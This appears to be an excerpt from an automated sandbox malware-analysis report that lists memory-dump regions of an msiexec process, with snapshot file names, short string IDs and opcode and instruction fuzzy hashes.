                                              Memory Dump Source
                                              • Source File: 00000006.00000002.3071457194.0000000023AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 23AA0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_23aa0000_msiexec.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: 'v#U$8cq$Hbq$Hbq$Hbq$TJcq
                                              • API String ID: 0-549694185
                                              • Opcode ID: 6627083ca82c430d79fa2cbbfe54efd328fa9dbea850ebf3b15c613f9259a828
                                              • Instruction ID: 4c4c7eaaaaaa65521383a30312983747fb33665eb9e214697134c19d7f0de537
                                              • Opcode Fuzzy Hash: 6627083ca82c430d79fa2cbbfe54efd328fa9dbea850ebf3b15c613f9259a828
                                              • Instruction Fuzzy Hash: 27D1D431B042448FCB05EB6CC890A9D7BB6FF89320F1945BAE905DB3A1CA35DD45CBA1
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.3071457194.0000000023AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 23AA0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_23aa0000_msiexec.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: $Hbq$Hbq$Hbq$x4v#$x4v#
                                              • API String ID: 0-1800963723
                                              • Opcode ID: 6bb28fe0e8c3950d2948e3726253bcc31e00cdd110c03d67ec08dd375edab371
                                              • Instruction ID: 19aac55fedb8d0765f0c61a4fb5ca5a39484cd0ae4bfa83a6e2b58586580b8f1
                                              • Opcode Fuzzy Hash: 6bb28fe0e8c3950d2948e3726253bcc31e00cdd110c03d67ec08dd375edab371
                                              • Instruction Fuzzy Hash: 4381B031B002449BDB157F78886866E3AB7BF95360F2446AEE9168B3D1CE39CD01CB95
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.3051975529.0000000002AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AC0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_2ac0000_msiexec.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: \;^q$\;^q$\;^q$\;^q
                                              • API String ID: 0-3001612457
                                              • Opcode ID: b57d5929eddb524bcce3e551df6421c36bdbeb58b129c6f1676375a7371cfbed
                                              • Instruction ID: cb8cc847f38e47fd270fa1ed4c81bac558fa165c4c7104553f86710e4d6c9532
                                              • Opcode Fuzzy Hash: b57d5929eddb524bcce3e551df6421c36bdbeb58b129c6f1676375a7371cfbed
                                              • Instruction Fuzzy Hash: 0E011631B402159F8B6CCF2DC584A2677EEABC8E64735456EE44ACB3B4DE21EC418791